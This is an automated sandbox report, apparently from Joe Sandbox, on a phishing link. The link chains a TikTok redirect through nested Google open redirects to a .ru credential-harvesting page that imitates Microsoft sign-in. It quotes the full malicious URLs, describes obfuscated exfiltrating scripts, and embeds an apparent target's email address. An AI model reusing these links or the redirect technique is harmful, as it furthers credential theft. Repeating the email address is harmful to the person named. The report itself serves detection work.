Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://www.tiktok.com/link/v2?aid=1988&lang=en&scene=bio_url&target=https%3A%2F%2Fgoogle.com%2Furl%3Fq%3Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%3Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%253Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%3D.%2F%2F%2F%2Famp%2Fs%2Fnvchw.com%2Fwinner%2F1dsbr%2FcmxhbXByb3NAb2Zzb

Overview

General Information

Sample URL:https://www.tiktok.com/link/v2?aid=1988&lang=en&scene=bio_url&target=https%3A%2F%2Fgoogle.com%2Furl%3Fq%3Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%3Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%253Dhttps%3A%2
Analysis ID:1590294
Infos:

Detection

Score:52
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
AI detected suspicious Javascript
Detected suspicious crossdomain redirect
HTML body contains low number of good links
HTML page contains hidden javascript code
HTML title does not match URL
Stores files to the Windows start menu directory

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 6252 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 7000 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2200 --field-trial-handle=1908,i,14219803706752478215,14568198449669623511,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6652 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.tiktok.com/link/v2?aid=1988&lang=en&scene=bio_url&target=https%3A%2F%2Fgoogle.com%2Furl%3Fq%3Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%3Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%253Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%3D.%2F%2F%2F%2Famp%2Fs%2Fnvchw.com%2Fwinner%2F1dsbr%2FcmxhbXByb3NAb2Zzb3B0aWNzLmNvbQ==?0s57db=MTMmMTMmMTMmMTMmQjEmRjQmb2JxdEczJkQ0Jk11bHdyVGhHeUtZLi45SjNYNlJyamY6ckY0JjMzJnV5ZnUub2ZlZWppMzMmRTQmdHRibWQxMyZvYnF0RDQmQjEmRjQmbW51aUczJkQ0JkIxJkY0JnplcGNHMyZENCZCMSZGNCZ6ZXBjRDQmQjEmRjQmZWJmaUczJkQ0JkIxJkY0JmZtenV0RzMmRDQmMTMmMTMmMTMmMTMmQjEmRTgmMTMmMTMmMTMmMTMmMTMmMTMmMTMmMTMmQjEmQzQmb2ZlZWppMTMmQjQmenVqbWpjanRqdzEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJkIxJkM0JmZ1aml4MTMmQjQmc3BtcGQxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyZCMSZDOCYxMyZ1eWZ1Lm9mZWVqaS8xMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyZCMSZGNCZmbXp1dEQ0JjEzJjEzJjEzJjEzJkIxJkY0JmZtdWp1RzMmRDQmZm5wSUY0JmZtdWp1RDQmMTMmMTMmMTMmMTMmQjEmRzMmKzEzJmZzMTMmZWViMTMmRTQmRTQmRTQmRTQmRTQmRTQmRDQmMTMmK0czJjEzJjEzJkY0JjMzJkI6NjMmMTk2MyYzRjYzJkRCNjMmMzk2MyYzRjYzJjRCNjMmNEQ2MyY1MyY1MyZCOjYzJjE5NjMmM0Y2MyZEQjYzJjM5NjMmM0Y2MyY0QjYzJjRENjMmRTQmRTQmeGN6Nnpka21IZXtHSGN4MlRaelM0Wm1HSFJpT1hidkdIZXs2VFp2R25bbVM0ZEczJkROUEVHMyZ6ZndzdnR0c2Z6YkczJmx2L3BkL3pmd3N2dHRzZnpiRzMmRzMmQjQmdHF1dWlFNCZtc3ZDNCYzMzMmRTQmdW9mdW9wZDEzJjMzJml0ZnNnZnMzMyZFNCZ3anZyZi5xdXVpMTMmYnVmbkQ0JjEzJjEzJjEzJjEzJkIxJkY0JjMzJjkuR1VWMzMmRTQmdWZ0c2JpZDEzJmJ1Zm5ENCYxMyYxMyYxMyYxMyZCMSZGNCZlYmZpRDQmQjEmRjQmbW51aUQ0JkIxJkY0Jm9icXRHMyZENCZkazdoWlZENCZ0ezVNRTQmTFhteDFPUWdkWFBZc3s1d0c5e1FFNiZDT0Y0JjMzJnV5ZnUub2ZlZWppMzMmRTQmdHRibWQxMyZvYnF0RDQmQjEm" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://m7sn.shaceshrov.ru/IgEEv/Avira URL Cloud: Label: malware
Source: https://ujnpr9srxzkc6ihaxhmueaobisqyzublxqweh4i01haujvjdngfifo9.ivertoneym.ru/34312312326475845lHPzVpHAawKXAPUEABCCOMUVHMSYIMKTEGPFLJPNZNMAvira URL Cloud: Label: malware
Source: https://m7sn.shaceshrov.ru/favicon.icoAvira URL Cloud: Label: malware

Phishing

barindex
Source: 1.2.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://m7sn.shaceshrov.ru/IgEEv/#Mrlampros@ofsopt... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to suspicious domains. It collects user data and sends it to an untrusted domain, and it also attempts to bypass form submission validation. Overall, the script demonstrates malicious intent and poses a significant security risk.
Source: 1.0.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://m7sn.shaceshrov.ru/IgEEv/#Mrlampros@ofsopt... The provided JavaScript snippet exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. While the intent of the script is not entirely clear, the combination of these factors suggests a potentially malicious nature. Further investigation is recommended to determine the true purpose and impact of this script.
Source: 1.1.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://m7sn.shaceshrov.ru/IgEEv/#Mrlampros@ofsopt... This script exhibits several high-risk behaviors, including detecting the presence of web automation tools, disabling common browser debugging and developer tools, and redirecting the user to a suspicious domain. The script also includes an interval function that triggers a debugger statement, which could be used to detect and bypass security measures. Overall, this script demonstrates a high level of malicious intent and should be considered a significant security risk.
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638724010536289726.YWZlZWNjNTgtN2Y2Yi00Njc5LThhZGMtMjEwYjJmZDZkZTI4YmQ5YTQyNDYtOWRlMy00YWRiLWE2OTctYWM0Yjg2OWY2MzNi&ui_locales=en-US&mkt=en-US&client-request-id=656f35df-d5fb-4c96-8c98-8defb01c0e2d&state=16_0u72f1vlPvxr_UeeolIeIIxtMbSWjzo36JIuICdMAIh2WsHTnXgALO-Mow-0yuqUhdwHbmOfH_qWLH3oiscOZ8O00t64a9T6PQmBUnqxzMJhUMwfE9is696LrHYQjcwnkMNdygz1VKozXHg8jZJLZZxUGNPmvOj_z0WkQc5FCRkCbKnNKcN3SLdSVUXrMuae9HwPGDuT0scRPVIyWCGze4vu603_80Zar6NdkfOx2yErS4Ejmz8TZAF_ptDP8SgmGZgxjPv1euccVZKWeKA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: Number of links: 0
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638724010536289726.YWZlZWNjNTgtN2Y2Yi00Njc5LThhZGMtMjEwYjJmZDZkZTI4YmQ5YTQyNDYtOWRlMy00YWRiLWE2OTctYWM0Yjg2OWY2MzNi&ui_locales=en-US&mkt=en-US&client-request-id=656f35df-d5fb-4c96-8c98-8defb01c0e2d&state=16_0u72f1vlPvxr_UeeolIeIIxtMbSWjzo36JIuICdMAIh2WsHTnXgALO-Mow-0yuqUhdwHbmOfH_qWLH3oiscOZ8O00t64a9T6PQmBUnqxzMJhUMwfE9is696LrHYQjcwnkMNdygz1VKozXHg8jZJLZZxUGNPmvOj_z0WkQc5FCRkCbKnNKcN3SLdSVUXrMuae9HwPGDuT0scRPVIyWCGze4vu603_80Zar6NdkfOx2yErS4Ejmz8TZAF_ptDP8SgmGZgxjPv1euccVZKWeKA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: Number of links: 0
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638724010536289726.YWZlZWNjNTgtN2Y2Yi00Njc5LThhZGMtMjEwYjJmZDZkZTI4YmQ5YTQyNDYtOWRlMy00YWRiLWE2OTctYWM0Yjg2OWY2MzNi&ui_locales=en-US&mkt=en-US&client-request-id=656f35df-d5fb-4c96-8c98-8defb01c0e2d&state=16_0u72f1vlPvxr_UeeolIeIIxtMbSWjzo36JIuICdMAIh2WsHTnXgALO-Mow-0yuqUhdwHbmOfH_qWLH3oiscOZ8O00t64a9T6PQmBUnqxzMJhUMwfE9is696LrHYQjcwnkMNdygz1VKozXHg8jZJLZZxUGNPmvOj_z0WkQc5FCRkCbKnNKcN3SLdSVUXrMuae9HwPGDuT0scRPVIyWCGze4vu603_80Zar6NdkfOx2yErS4Ejmz8TZAF_ptDP8SgmGZgxjPv1euccVZKWeKA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: Base64 decoded: afeecc58-7f6b-4679-8adc-210b2fd6de28bd9a4246-9de3-4adb-a697-ac4b869f633b
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638724010536289726.YWZlZWNjNTgtN2Y2Yi00Njc5LThhZGMtMjEwYjJmZDZkZTI4YmQ5YTQyNDYtOWRlMy00YWRiLWE2OTctYWM0Yjg2OWY2MzNi&ui_locales=en-US&mkt=en-US&client-request-id=656f35df-d5fb-4c96-8c98-8defb01c0e2d&state=16_0u72f1vlPvxr_UeeolIeIIxtMbSWjzo36JIuICdMAIh2WsHTnXgALO-Mow-0yuqUhdwHbmOfH_qWLH3oiscOZ8O00t64a9T6PQmBUnqxzMJhUMwfE9is696LrHYQjcwnkMNdygz1VKozXHg8jZJLZZxUGNPmvOj_z0WkQc5FCRkCbKnNKcN3SLdSVUXrMuae9HwPGDuT0scRPVIyWCGze4vu603_80Zar6NdkfOx2yErS4Ejmz8TZAF_ptDP8SgmGZgxjPv1euccVZKWeKA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: Title: Redirecting does not match URL
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638724010536289726.YWZlZWNjNTgtN2Y2Yi00Njc5LThhZGMtMjEwYjJmZDZkZTI4YmQ5YTQyNDYtOWRlMy00YWRiLWE2OTctYWM0Yjg2OWY2MzNi&ui_locales=en-US&mkt=en-US&client-request-id=656f35df-d5fb-4c96-8c98-8defb01c0e2d&state=16_0u72f1vlPvxr_UeeolIeIIxtMbSWjzo36JIuICdMAIh2WsHTnXgALO-Mow-0yuqUhdwHbmOfH_qWLH3oiscOZ8O00t64a9T6PQmBUnqxzMJhUMwfE9is696LrHYQjcwnkMNdygz1VKozXHg8jZJLZZxUGNPmvOj_z0WkQc5FCRkCbKnNKcN3SLdSVUXrMuae9HwPGDuT0scRPVIyWCGze4vu603_80Zar6NdkfOx2yErS4Ejmz8TZAF_ptDP8SgmGZgxjPv1euccVZKWeKA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: Title: Sign in to your account does not match URL
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638724010536289726.YWZlZWNjNTgtN2Y2Yi00Njc5LThhZGMtMjEwYjJmZDZkZTI4YmQ5YTQyNDYtOWRlMy00YWRiLWE2OTctYWM0Yjg2OWY2MzNi&ui_locales=en-US&mkt=en-US&client-request-id=656f35df-d5fb-4c96-8c98-8defb01c0e2d&state=16_0u72f1vlPvxr_UeeolIeIIxtMbSWjzo36JIuICdMAIh2WsHTnXgALO-Mow-0yuqUhdwHbmOfH_qWLH3oiscOZ8O00t64a9T6PQmBUnqxzMJhUMwfE9is696LrHYQjcwnkMNdygz1VKozXHg8jZJLZZxUGNPmvOj_z0WkQc5FCRkCbKnNKcN3SLdSVUXrMuae9HwPGDuT0scRPVIyWCGze4vu603_80Zar6NdkfOx2yErS4Ejmz8TZAF_ptDP8SgmGZgxjPv1euccVZKWeKA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: <input type="password" .../> found
Source: https://m7sn.shaceshrov.ru/IgEEv/#Mrlampros@ofsoptics.comHTTP Parser: No favicon
Source: https://m7sn.shaceshrov.ru/IgEEv/#Mrlampros@ofsoptics.comHTTP Parser: No favicon
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638724010536289726.YWZlZWNjNTgtN2Y2Yi00Njc5LThhZGMtMjEwYjJmZDZkZTI4YmQ5YTQyNDYtOWRlMy00YWRiLWE2OTctYWM0Yjg2OWY2MzNi&ui_locales=en-US&mkt=en-US&client-request-id=656f35df-d5fb-4c96-8c98-8defb01c0e2d&state=16_0u72f1vlPvxr_UeeolIeIIxtMbSWjzo36JIuICdMAIh2WsHTnXgALO-Mow-0yuqUhdwHbmOfH_qWLH3oiscOZ8O00t64a9T6PQmBUnqxzMJhUMwfE9is696LrHYQjcwnkMNdygz1VKozXHg8jZJLZZxUGNPmvOj_z0WkQc5FCRkCbKnNKcN3SLdSVUXrMuae9HwPGDuT0scRPVIyWCGze4vu603_80Zar6NdkfOx2yErS4Ejmz8TZAF_ptDP8SgmGZgxjPv1euccVZKWeKA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: No favicon
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638724010536289726.YWZlZWNjNTgtN2Y2Yi00Njc5LThhZGMtMjEwYjJmZDZkZTI4YmQ5YTQyNDYtOWRlMy00YWRiLWE2OTctYWM0Yjg2OWY2MzNi&ui_locales=en-US&mkt=en-US&client-request-id=656f35df-d5fb-4c96-8c98-8defb01c0e2d&state=16_0u72f1vlPvxr_UeeolIeIIxtMbSWjzo36JIuICdMAIh2WsHTnXgALO-Mow-0yuqUhdwHbmOfH_qWLH3oiscOZ8O00t64a9T6PQmBUnqxzMJhUMwfE9is696LrHYQjcwnkMNdygz1VKozXHg8jZJLZZxUGNPmvOj_z0WkQc5FCRkCbKnNKcN3SLdSVUXrMuae9HwPGDuT0scRPVIyWCGze4vu603_80Zar6NdkfOx2yErS4Ejmz8TZAF_ptDP8SgmGZgxjPv1euccVZKWeKA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: No <meta name="author".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638724010536289726.YWZlZWNjNTgtN2Y2Yi00Njc5LThhZGMtMjEwYjJmZDZkZTI4YmQ5YTQyNDYtOWRlMy00YWRiLWE2OTctYWM0Yjg2OWY2MzNi&ui_locales=en-US&mkt=en-US&client-request-id=656f35df-d5fb-4c96-8c98-8defb01c0e2d&state=16_0u72f1vlPvxr_UeeolIeIIxtMbSWjzo36JIuICdMAIh2WsHTnXgALO-Mow-0yuqUhdwHbmOfH_qWLH3oiscOZ8O00t64a9T6PQmBUnqxzMJhUMwfE9is696LrHYQjcwnkMNdygz1VKozXHg8jZJLZZxUGNPmvOj_z0WkQc5FCRkCbKnNKcN3SLdSVUXrMuae9HwPGDuT0scRPVIyWCGze4vu603_80Zar6NdkfOx2yErS4Ejmz8TZAF_ptDP8SgmGZgxjPv1euccVZKWeKA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="author".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638724010536289726.YWZlZWNjNTgtN2Y2Yi00Njc5LThhZGMtMjEwYjJmZDZkZTI4YmQ5YTQyNDYtOWRlMy00YWRiLWE2OTctYWM0Yjg2OWY2MzNi&ui_locales=en-US&mkt=en-US&client-request-id=656f35df-d5fb-4c96-8c98-8defb01c0e2d&state=16_0u72f1vlPvxr_UeeolIeIIxtMbSWjzo36JIuICdMAIh2WsHTnXgALO-Mow-0yuqUhdwHbmOfH_qWLH3oiscOZ8O00t64a9T6PQmBUnqxzMJhUMwfE9is696LrHYQjcwnkMNdygz1VKozXHg8jZJLZZxUGNPmvOj_z0WkQc5FCRkCbKnNKcN3SLdSVUXrMuae9HwPGDuT0scRPVIyWCGze4vu603_80Zar6NdkfOx2yErS4Ejmz8TZAF_ptDP8SgmGZgxjPv1euccVZKWeKA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="author".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638724010536289726.YWZlZWNjNTgtN2Y2Yi00Njc5LThhZGMtMjEwYjJmZDZkZTI4YmQ5YTQyNDYtOWRlMy00YWRiLWE2OTctYWM0Yjg2OWY2MzNi&ui_locales=en-US&mkt=en-US&client-request-id=656f35df-d5fb-4c96-8c98-8defb01c0e2d&state=16_0u72f1vlPvxr_UeeolIeIIxtMbSWjzo36JIuICdMAIh2WsHTnXgALO-Mow-0yuqUhdwHbmOfH_qWLH3oiscOZ8O00t64a9T6PQmBUnqxzMJhUMwfE9is696LrHYQjcwnkMNdygz1VKozXHg8jZJLZZxUGNPmvOj_z0WkQc5FCRkCbKnNKcN3SLdSVUXrMuae9HwPGDuT0scRPVIyWCGze4vu603_80Zar6NdkfOx2yErS4Ejmz8TZAF_ptDP8SgmGZgxjPv1euccVZKWeKA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: No <meta name="copyright".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638724010536289726.YWZlZWNjNTgtN2Y2Yi00Njc5LThhZGMtMjEwYjJmZDZkZTI4YmQ5YTQyNDYtOWRlMy00YWRiLWE2OTctYWM0Yjg2OWY2MzNi&ui_locales=en-US&mkt=en-US&client-request-id=656f35df-d5fb-4c96-8c98-8defb01c0e2d&state=16_0u72f1vlPvxr_UeeolIeIIxtMbSWjzo36JIuICdMAIh2WsHTnXgALO-Mow-0yuqUhdwHbmOfH_qWLH3oiscOZ8O00t64a9T6PQmBUnqxzMJhUMwfE9is696LrHYQjcwnkMNdygz1VKozXHg8jZJLZZxUGNPmvOj_z0WkQc5FCRkCbKnNKcN3SLdSVUXrMuae9HwPGDuT0scRPVIyWCGze4vu603_80Zar6NdkfOx2yErS4Ejmz8TZAF_ptDP8SgmGZgxjPv1euccVZKWeKA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638724010536289726.YWZlZWNjNTgtN2Y2Yi00Njc5LThhZGMtMjEwYjJmZDZkZTI4YmQ5YTQyNDYtOWRlMy00YWRiLWE2OTctYWM0Yjg2OWY2MzNi&ui_locales=en-US&mkt=en-US&client-request-id=656f35df-d5fb-4c96-8c98-8defb01c0e2d&state=16_0u72f1vlPvxr_UeeolIeIIxtMbSWjzo36JIuICdMAIh2WsHTnXgALO-Mow-0yuqUhdwHbmOfH_qWLH3oiscOZ8O00t64a9T6PQmBUnqxzMJhUMwfE9is696LrHYQjcwnkMNdygz1VKozXHg8jZJLZZxUGNPmvOj_z0WkQc5FCRkCbKnNKcN3SLdSVUXrMuae9HwPGDuT0scRPVIyWCGze4vu603_80Zar6NdkfOx2yErS4Ejmz8TZAF_ptDP8SgmGZgxjPv1euccVZKWeKA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
Source: C:\Program Files\Google\Chrome\Application\chrome.exeHTTP traffic: Redirect from: www.google.com to https://nvchw.com/winner/1dsbr/cmxhbxbyb3nab2zzb3b0awnzlmnvbq==
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 184.30.131.245
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknownTCP traffic detected without corresponding DNS query: 184.30.131.245
Source: unknownTCP traffic detected without corresponding DNS query: 184.30.131.245
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /url?q=https%3A%2F%2Fwww.google.com%2Furl%3Fq%3Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%3Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%3D.%2F%2F%2F%2Famp%2Fs%2Fnvchw.com%2Fwinner%2F1dsbr%2FcmxhbXByb3NAb2Zzb3B0aWNzLmNvbQ%3D%3D%3F0s57db%3DMTMmMTMmMTMmMTMmQjEmRjQmb2JxdEczJkQ0Jk11bHdyVGhHeUtZLi45SjNYNlJyamY6ckY0JjMzJnV5ZnUub2ZlZWppMzMmRTQmdHRibWQxMyZvYnF0RDQmQjEmRjQmbW51aUczJkQ0JkIxJkY0JnplcGNHMyZENCZCMSZGNCZ6ZXBjRDQmQjEmRjQmZWJmaUczJkQ0JkIxJkY0JmZtenV0RzMmRDQmMTMmMTMmMTMmMTMmQjEmRTgmMTMmMTMmMTMmMTMmMTMmMTMmMTMmMTMmQjEmQzQmb2ZlZWppMTMmQjQmenVqbWpjanRqdzEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJkIxJkM0JmZ1aml4MTMmQjQmc3BtcGQxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyZCMSZDOCYxMyZ1eWZ1Lm9mZWVqaS8xMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyZCMSZGNCZmbXp1dEQ0JjEzJjEzJjEzJjEzJkIxJkY0JmZtdWp1RzMmRDQmZm5wSUY0JmZtdWp1RDQmMTMmMTMmMTMmMTMmQjEmRzMmKzEzJmZzMTMmZWViMTMmRTQmRTQmRTQmRTQmRTQmRTQmRDQmMTMmK0czJjEzJjEzJkY0JjMzJkI6NjMmMTk2MyYzRjYzJkRCNjMmMzk2MyYzRjYzJjRCNjMmNEQ2MyY1MyY1MyZCOjYzJjE5NjMmM0Y2MyZEQjYzJjM5NjMmM0Y2MyY0QjYzJjRENjMmRTQmRTQmeGN6Nnpka21IZXtHSGN4MlRaelM0Wm1HSFJpT1hidkdIZXs2VFp2R25bbVM0ZEczJkROUEVHMyZ6ZndzdnR0c2Z6YkczJmx2L3BkL3pmd3N2dHRzZnpiRzMmRzMmQjQmdHF1dWlFNCZtc3ZDNCYzMzMmRTQmdW9mdW9wZDEzJjMzJml0ZnNnZnMzMyZFNCZ3anZyZi5xdXVpMTMmYnVmbkQ0JjEzJjEzJjEzJjEzJkIxJkY0JjMzJjkuR1VWMzMmRTQmdWZ0c2JpZDEzJmJ1Zm5ENCYxMyYxMyYxMyYxMyZCMSZGNCZlYmZpRDQmQjEmRjQmbW51aUQ0JkIxJkY0Jm9icXRHMyZENCZkazdoWlZENCZ0ezVNRTQmTFhteDFPUWdkWFBZc3s1d0c5e1FFNiZDT0Y0JjMzJnV5ZnUub2ZlZWppMzMmRTQmdHRibWQxMyZvYn